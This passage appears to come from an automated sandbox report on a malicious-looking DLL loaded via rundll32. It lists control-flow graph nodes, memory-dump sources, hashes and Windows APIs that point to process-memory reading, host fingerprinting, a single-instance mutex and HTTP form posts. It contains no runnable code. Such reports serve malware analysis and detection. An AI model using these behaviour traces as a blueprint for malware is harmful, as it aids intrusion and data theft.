7ffb1c8147b4-7ffb1c814815 NtQueryInformationProcess 91->92 98 7ffb1c81481b-7ffb1c814824 92->98 99 7ffb1c814b27-7ffb1c814b2c FindCloseChangeNotification 92->99 101 7ffb1c814c23 call 7ffb1c814c38 93->101 102 7ffb1c814c28-7ffb1c814c34 93->102 110 7ffb1c814b71-7ffb1c814b82 94->110 97->91 103 7ffb1c814785 97->103 98->99 104 7ffb1c81482a-7ffb1c81487b ReadProcessMemory 98->104 99->87 101->102 103->91 104->99 107 7ffb1c814881-7ffb1c8148d5 ReadProcessMemory 104->107 107->99 109 7ffb1c8148db-7ffb1c8148e5 107->109 109->99 111 7ffb1c8148eb-7ffb1c814999 call 7ffb1c81ad34 WideCharToMultiByte call 7ffb1c81bfcc * 2 109->111 112 7ffb1c814c14 110->112 113 7ffb1c814b88-7ffb1c814b9f call 7ffb1c81ae78 110->113 128 7ffb1c81499b-7ffb1c8149d2 call 7ffb1c81bfcc 111->128 129 7ffb1c8149f4-7ffb1c8149fa 111->129 112->93 118 7ffb1c814ba1-7ffb1c814bb1 113->118 119 7ffb1c814bb3-7ffb1c814bbb 113->119 121 7ffb1c814bc3-7ffb1c814be7 call 7ffb1c81beb0 call 7ffb1c81b900 118->121 119->121 135 7ffb1c814bf3 121->135 136 7ffb1c814be9-7ffb1c814bf1 121->136 128->129 139 7ffb1c8149d4-7ffb1c8149ef call 7ffb1c81bfcc 128->139 132 7ffb1c814a1c-7ffb1c814a53 call 7ffb1c816298 * 2 129->132 133 7ffb1c8149fc-7ffb1c814a17 call 7ffb1c81bfcc 129->133 149 7ffb1c814b04-7ffb1c814b09 132->149 150 7ffb1c814a59 132->150 133->132 140 7ffb1c814bfb-7ffb1c814c12 call 7ffb1c817b40 135->140 136->140 139->129 140->93 151 7ffb1c814b0b-7ffb1c814b13 149->151 152 7ffb1c814b1d-7ffb1c814b22 call 7ffb1c817b40 149->152 153 7ffb1c814a62-7ffb1c814a7e call 7ffb1c81bd7c 150->153 151->152 155 7ffb1c814b15 151->155 152->99 158 7ffb1c814aac-7ffb1c814ac1 153->158 159 7ffb1c814a80-7ffb1c814aaa call 7ffb1c81bc1c call 7ffb1c81ad90 153->159 155->152 161 7ffb1c814af3-7ffb1c814afd call 7ffb1c816298 158->161 162 7ffb1c814ac3-7ffb1c814af1 call 7ffb1c81bc1c call 7ffb1c816298 158->162 159->153 161->149 162->149
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentMemory$Read$AllocateByteChangeCharCloseFindHandleInformationModuleMultiNameNotificationOpenQueryUserVirtualWidewsprintf
                          • String ID:
                          • API String ID: 2225485709-0
                          • Opcode ID: 87250553c3aa292502944f3e15e1c9efea1f990ae94d0822f0496687024c8696
                          • Instruction ID: 771b739b5c3bd74e5e7cb9c014b8c802422b45f3aea7ac4c6541bea50cce47e9
                          • Opcode Fuzzy Hash: 87250553c3aa292502944f3e15e1c9efea1f990ae94d0822f0496687024c8696
                          • Instruction Fuzzy Hash: 01F1F9F1909E86C9E760DB24E4983FAA3E2FB84764F605135E68D83A95DF3CE545CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 2498367268-1545510068
                          • Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                          • Instruction ID: c2cd6f28388bd1e75ae4abc340420f32ddb92a586a96a95c8955d3654937636c
                          • Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                          • Instruction Fuzzy Hash: A921E3B2508B808AE760CF14F49839BB7A1F3C0364F908229E2D947AA8CF7DD549CF40

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdaptersInfo$AllocateMemoryVirtual
                          • String ID: o
                          • API String ID: 2718687846-252678980
                          • Opcode ID: 13195bdf0bb6a59d94c018a0841dea2ee7fca6d4c6a805ffbd21c81ec795536a
                          • Instruction ID: ad26d22b11623611f5072ffa8344829d2848eab03d71b66809bf92cc5172373f
                          • Opcode Fuzzy Hash: 13195bdf0bb6a59d94c018a0841dea2ee7fca6d4c6a805ffbd21c81ec795536a
                          • Instruction Fuzzy Hash: A6111FB6908B41C6D7709B20E0883AAB7E1F7887A8F541235E6CD46B68DF7CD684CF04

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90f3b0c131f632c7cd4ed2f961d207eb86d46f14186625d359e785690b4c6d7e
                          • Instruction ID: 4e574648e8d0e9610a3e35d25c4bd8dcfc98ebfc64748d8105f9d22f5d675b67
                          • Opcode Fuzzy Hash: 90f3b0c131f632c7cd4ed2f961d207eb86d46f14186625d359e785690b4c6d7e
                          • Instruction Fuzzy Hash: 77410DF2619A81C9D750DB25E4847BEA7E1FB84794F606035EA8E83B69DF3CD445CB00

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem
                          • String ID:
                          • API String ID: 2188284642-0
                          • Opcode ID: e51b0eb4244eca9b40c6a37145ddddca8cb203ca42d873ec74cfc419f2d178c7
                          • Instruction ID: c1e769cc0868db1b60916ff06ae16d7ec207c9532c6770ac4bae281612c0483b
                          • Opcode Fuzzy Hash: e51b0eb4244eca9b40c6a37145ddddca8cb203ca42d873ec74cfc419f2d178c7
                          • Instruction Fuzzy Hash: 4931FDE191CE82C9E6609B31E4CD3FAA3E6FB84374F601235E69E826D9DF2CD505C600

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID: @
                          • API String ID: 2167126740-2766056989
                          • Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                          • Instruction ID: ef572c6374451c18aafc5cb50b552a496c5f50425c7fc921553fc13f347ad5f3
                          • Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                          • Instruction Fuzzy Hash: 2BE012B2528A8086D6409F24E45579AB761FB847B4F502311F6A946AD8CF7CC1148B00
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileInitStringUnicode
                          • String ID:
                          • API String ID: 2498367268-0
                          • Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                          • Instruction ID: bdf6e8e16cd9c3f048f429dff030b00beecd6e95d07d23912f31142ed9a48e2d
                          • Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                          • Instruction Fuzzy Hash: 87011BB2608941C6D630EB25E48416AA7E1F789798F601135EA8D83A59CF2DD6418F00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 8026c00e5c50a70795779a5455b93cc453d36c3d9fc0f045749414a97d51ca7f
                          • Instruction ID: 8547d94b38be38b21d60de2719c6e553eb536e0d7917bf306e6e93b845d22244
                          • Opcode Fuzzy Hash: 8026c00e5c50a70795779a5455b93cc453d36c3d9fc0f045749414a97d51ca7f
                          • Instruction Fuzzy Hash: DCF044F151CA41C9E7709B20E4887BA67A1FB847B8F601734F6AD46AD9CF3DD2458B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeMemoryVirtual
                          • String ID:
                          • API String ID: 3963845541-0
                          • Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                          • Instruction ID: 434c683502f98792e6cdc00cbc9f51c0ef18655964abe633e911aea267763e2b
                          • Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                          • Instruction Fuzzy Hash: 50E0E6B1508E8191D7609F60E4487997771F785374FA44325EBB941AE4CF7CC24ACF01
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DelayExecution
                          • String ID:
                          • API String ID: 1249177460-0
                          • Opcode ID: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
                          • Instruction ID: f32f9425a6aa2b27a29cca9a86fae9545b10102f4b298e1a913f8e79c5a496d0
                          • Opcode Fuzzy Hash: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
                          • Instruction Fuzzy Hash: ABD0C7B2A1868197CB245F24E44905A77A1FB95304FD04529E68D45754DF3CD525CF04

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 7ffb1c815750-7ffb1c8157dc call 7ffb1c81ae78 175 7ffb1c8157de-7ffb1c8157ee 172->175 176 7ffb1c8157f0-7ffb1c8157f8 172->176 177 7ffb1c815800-7ffb1c81581b 175->177 176->177 178 7ffb1c81582d-7ffb1c815838 177->178 179 7ffb1c815846-7ffb1c81584b 178->179 180 7ffb1c81583a-7ffb1c81583f call 7ffb1c81c934 178->180 182 7ffb1c815851-7ffb1c815877 call 7ffb1c81ad34 179->182 183 7ffb1c816243-7ffb1c81624c 179->183 184 7ffb1c815844 180->184 188 7ffb1c81587e-7ffb1c8158d0 call 7ffb1c81ae1c 182->188 189 7ffb1c815879 182->189 184->178 192 7ffb1c8158e1-7ffb1c8158f7 188->192 193 7ffb1c8158d2-7ffb1c8158da 188->193 189->183 195 7ffb1c815906-7ffb1c815921 192->195 196 7ffb1c8158f9-7ffb1c8158ff 192->196 193->192 194 7ffb1c8158dc call 7ffb1c81ce20 193->194 194->192 198 7ffb1c815941-7ffb1c815951 195->198 199 7ffb1c815923-7ffb1c81593f 195->199 196->195 200 7ffb1c815959-7ffb1c81599d call 7ffb1c8152c4 198->200 199->200 203 7ffb1c81599f-7ffb1c8159bb call 7ffb1c81bc1c call 7ffb1c81bae0 200->203 204 7ffb1c8159c3-7ffb1c8159cc 200->204 203->204 205 7ffb1c8159db-7ffb1c8159e3 204->205 206 7ffb1c8159ce-7ffb1c8159d6 call 7ffb1c817b40 204->206 209 7ffb1c815a22-7ffb1c815a2a 205->209 210 7ffb1c8159e5-7ffb1c8159eb 205->210 206->205 213 7ffb1c815a2c-7ffb1c815a32 209->213 214 7ffb1c815a56-7ffb1c815a5e 209->214 210->209 212 7ffb1c8159ed-7ffb1c815a17 call 7ffb1c81bc1c call 7ffb1c81bae0 210->212 212->209 213->214 217 7ffb1c815a34-7ffb1c815a4b 213->217 218 7ffb1c815a60-7ffb1c815a66 214->218 219 7ffb1c815a8a-7ffb1c815a92 214->219 217->214 218->219 224 7ffb1c815a68-7ffb1c815a7f 218->224 221 7ffb1c815abe-7ffb1c815ac4 219->221 222 7ffb1c815a94-7ffb1c815a9a 219->222 226 7ffb1c815ceb-7ffb1c815cf4 221->226 227 7ffb1c815aca-7ffb1c815ad1 221->227 222->221 225 7ffb1c815a9c-7ffb1c815ab3 222->225 224->219 225->221 229 7ffb1c815cf6-7ffb1c815d06 226->229 230 7ffb1c815d08-7ffb1c815d10 226->230 231 7ffb1c815bc6-7ffb1c815bcf 227->231 232 7ffb1c815ad7-7ffb1c815ae0 227->232 234 7ffb1c815d18-7ffb1c815d2f call 7ffb1c81ae78 229->234 230->234 237 7ffb1c815bd1-7ffb1c815be1 231->237 238 7ffb1c815be3-7ffb1c815beb 231->238 235 7ffb1c815ae2-7ffb1c815af2 232->235 236 7ffb1c815af4-7ffb1c815afc 232->236 246 7ffb1c815d31-7ffb1c815d41 234->246 247 7ffb1c815d43-7ffb1c815d4b 234->247 241 7ffb1c815b04-7ffb1c815b1b call 7ffb1c81ae78 235->241 236->241 239 7ffb1c815bf3-7ffb1c815c0a call 7ffb1c81ae78 237->239 238->239 249 7ffb1c815c0c-7ffb1c815c1c 239->249 250 7ffb1c815c1e-7ffb1c815c26 239->250 252 7ffb1c815b1d-7ffb1c815b2d 241->252 253 7ffb1c815b2f-7ffb1c815b37 241->253 251 7ffb1c815d53-7ffb1c815df2 wsprintfA call 7ffb1c81b984 call 7ffb1c81bc1c 246->251 247->251 254 7ffb1c815c2e-7ffb1c815cac wsprintfA 249->254 250->254 264 7ffb1c815df6-7ffb1c815dff 251->264 256 7ffb1c815b3f-7ffb1c815bc1 wsprintfA 252->256 253->256 257 7ffb1c815cb0-7ffb1c815cb7 254->257 256->257 259 7ffb1c815ce6 257->259 260 7ffb1c815cb9-7ffb1c815cd0 call 7ffb1c817fa8 call 7ffb1c81b984 257->260 259->264 272 7ffb1c815cd5-7ffb1c815ce2 call 7ffb1c81bc1c 260->272 266 7ffb1c815e0e-7ffb1c815e2c call 7ffb1c81ad34 264->266 267 7ffb1c815e01-7ffb1c815e09 call 7ffb1c817b40 264->267 273 7ffb1c815e2e 266->273 274 7ffb1c815e33-7ffb1c815e9c call 7ffb1c81bc1c call 7ffb1c81cbe0 call 7ffb1c81c964 call 7ffb1c816634 266->274 267->266 272->259 273->183 285 7ffb1c815e9e 274->285 286 7ffb1c815ea3-7ffb1c815ec9 call 7ffb1c814d20 274->286 285->183 289 7ffb1c815ecb-7ffb1c815ed5 286->289 290 7ffb1c815eda-7ffb1c815ee3 286->290 291 7ffb1c815fc7-7ffb1c815fd0 289->291 292 7ffb1c815ee5 290->292 293 7ffb1c815eea-7ffb1c815f05 call 7ffb1c816370 290->293 295 7ffb1c815feb-7ffb1c815ff4 291->295 296 7ffb1c815fd2-7ffb1c815fdf call 7ffb1c817b40 291->296 292->291 297 7ffb1c815f0a-7ffb1c815f1b 293->297 299 7ffb1c81600f-7ffb1c816018 295->299 300 7ffb1c815ff6-7ffb1c815ffe call 7ffb1c817b40 295->300 296->295 301 7ffb1c815f1d 297->301 302 7ffb1c815f22-7ffb1c815f2a 297->302 305 7ffb1c816033-7ffb1c81603c 299->305 306 7ffb1c81601a-7ffb1c816027 call 7ffb1c817b40 299->306 312 7ffb1c816003 300->312 301->291 310 7ffb1c815f3b-7ffb1c815f5a call 7ffb1c81ad34 302->310 311 7ffb1c815f2c-7ffb1c815f36 302->311 308 7ffb1c81603e-7ffb1c81604b call 7ffb1c817b40 305->308 309 7ffb1c816057-7ffb1c816060 305->309 306->305 308->309 315 7ffb1c81607b-7ffb1c816086 309->315 316 7ffb1c816062-7ffb1c81606f call 7ffb1c817b40 309->316 324 7ffb1c815f5c 310->324 325 7ffb1c815f5e-7ffb1c815fc1 call 7ffb1c81bc1c call 7ffb1c81cbe0 call 7ffb1c81c964 call 7ffb1c81541c 310->325 311->291 312->299 320 7ffb1c816090-7ffb1c816096 315->320 321 7ffb1c816088 315->321 316->315 326 7ffb1c8160ab-7ffb1c8160b4 320->326 327 7ffb1c816098-7ffb1c8160a2 call 7ffb1c817b40 320->327 321->320 324->291 325->286 325->291 328 7ffb1c8160cf-7ffb1c8160da 326->328 329 7ffb1c8160b6-7ffb1c8160c3 call 7ffb1c817b40 326->329 327->326 333 7ffb1c8160dc 328->333 334 7ffb1c8160e1-7ffb1c8160f6 328->334 329->328 333->179 339 7ffb1c816106-7ffb1c81610d 334->339 340 7ffb1c8160f8-7ffb1c816100 334->340 342 7ffb1c81610f-7ffb1c816119 339->342 343 7ffb1c816123-7ffb1c81614c call 7ffb1c8188a4 339->343 340->339 342->343 349 7ffb1c81614e-7ffb1c816169 call 7ffb1c8188a4 343->349 350 7ffb1c816170-7ffb1c81617b 343->350 349->350 351 7ffb1c81618d-7ffb1c8161a4 350->351 354 7ffb1c81622b-7ffb1c816232 351->354 355 7ffb1c8161aa-7ffb1c8161b2 351->355 359 7ffb1c81623e 354->359 360 7ffb1c816234 354->360 357 7ffb1c8161e3-7ffb1c8161eb 355->357 358 7ffb1c8161b4-7ffb1c8161d4 GetExitCodeThread 355->358 362 7ffb1c81621c-7ffb1c816226 call 7ffb1c81c934 357->362 363 7ffb1c8161ed-7ffb1c81620d GetExitCodeThread 357->363 358->357 361 7ffb1c8161d6-7ffb1c8161e1 358->361 359->179 360->359 361->354 362->351 363->362 364 7ffb1c81620f-7ffb1c81621a 363->364 364->354
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 511820185-0
                          • Opcode ID: 8ac5d10f5c4be1f39c332322c31a8ce84f66ac12bee2500c0bc3922722ddae2f
                          • Instruction ID: c6c17eb7c74fc6627e2b637d6e1151accfa05beb46e4cce65ed25e2356e0619a
                          • Opcode Fuzzy Hash: 8ac5d10f5c4be1f39c332322c31a8ce84f66ac12bee2500c0bc3922722ddae2f
                          • Instruction Fuzzy Hash: 1B52B8F190DE86C9E7708B24E4883FAB6E2FB84364F205135D68D86AA5DF7CE445CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HttpRequest$OpenSend$InternetOption
                          • String ID: Content-Type: application/x-www-form-urlencoded
                          • API String ID: 664753792-457374458
                          • Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                          • Instruction ID: 9518b484e937574f5a2890dab61873d89d3e15ce0e85fa296208f2698ec7ccac
                          • Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                          • Instruction Fuzzy Hash: 0761D8F690DB81C9E7608B24F4883EAB7A2F794754F601035E68D42A68DF7DD544CB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 408 7ffb1c813868-7ffb1c81388f call 7ffb1c81ae1c call 7ffb1c816328 413 7ffb1c81389b-7ffb1c8138a2 call 7ffb1c813074 408->413 414 7ffb1c813891-7ffb1c813896 408->414 418 7ffb1c8138ae-7ffb1c8138bf call 7ffb1c818560 call 7ffb1c818820 413->418 419 7ffb1c8138a4-7ffb1c8138a9 413->419 415 7ffb1c813a1a-7ffb1c813a21 414->415 424 7ffb1c8138c1-7ffb1c8138c6 418->424 425 7ffb1c8138d2-7ffb1c8138da call 7ffb1c818820 418->425 419->415 424->425 426 7ffb1c8138c8-7ffb1c8138cd 424->426 429 7ffb1c8138dc-7ffb1c8138e1 425->429 430 7ffb1c8138ed-7ffb1c81390e GetCurrentProcess IsWow64Process 425->430 426->415 429->430 431 7ffb1c8138e3-7ffb1c8138e8 429->431 432 7ffb1c813910-7ffb1c813915 430->432 433 7ffb1c81391a-7ffb1c813921 call 7ffb1c8168e8 430->433 431->415 432->415 436 7ffb1c81392d-7ffb1c813941 call 7ffb1c81ae78 433->436 437 7ffb1c813923-7ffb1c813928 433->437 440 7ffb1c81394f-7ffb1c813954 436->440 441 7ffb1c813943-7ffb1c81394d 436->441 437->415 442 7ffb1c813959-7ffb1c813977 CreateMutexW 440->442 441->442 443 7ffb1c81398d-7ffb1c81399a 442->443 444 7ffb1c813979-7ffb1c81398b GetLastError 442->444 443->415 444->443 445 7ffb1c81399c-7ffb1c8139b3 GetModuleHandleW call 7ffb1c81463c 444->445 448 7ffb1c8139bc-7ffb1c8139c3 call 7ffb1c816988 445->448 449 7ffb1c8139b5-7ffb1c8139ba 445->449 452 7ffb1c8139cc-7ffb1c8139d3 call 7ffb1c816864 448->452 453 7ffb1c8139c5-7ffb1c8139ca 448->453 449->415 456 7ffb1c8139dc-7ffb1c8139e8 call 7ffb1c81cf14 call 7ffb1c81378c 452->456 457 7ffb1c8139d5-7ffb1c8139da 452->457 453->415 462 7ffb1c8139fb 456->462 463 7ffb1c8139ea-7ffb1c8139f9 call 7ffb1c8133ac 456->463 457->415 464 7ffb1c813a05-7ffb1c813a0c call 7ffb1c816250 462->464 463->464 468 7ffb1c813a11-7ffb1c813a16 464->468 468->415
                          Memory Dump Source
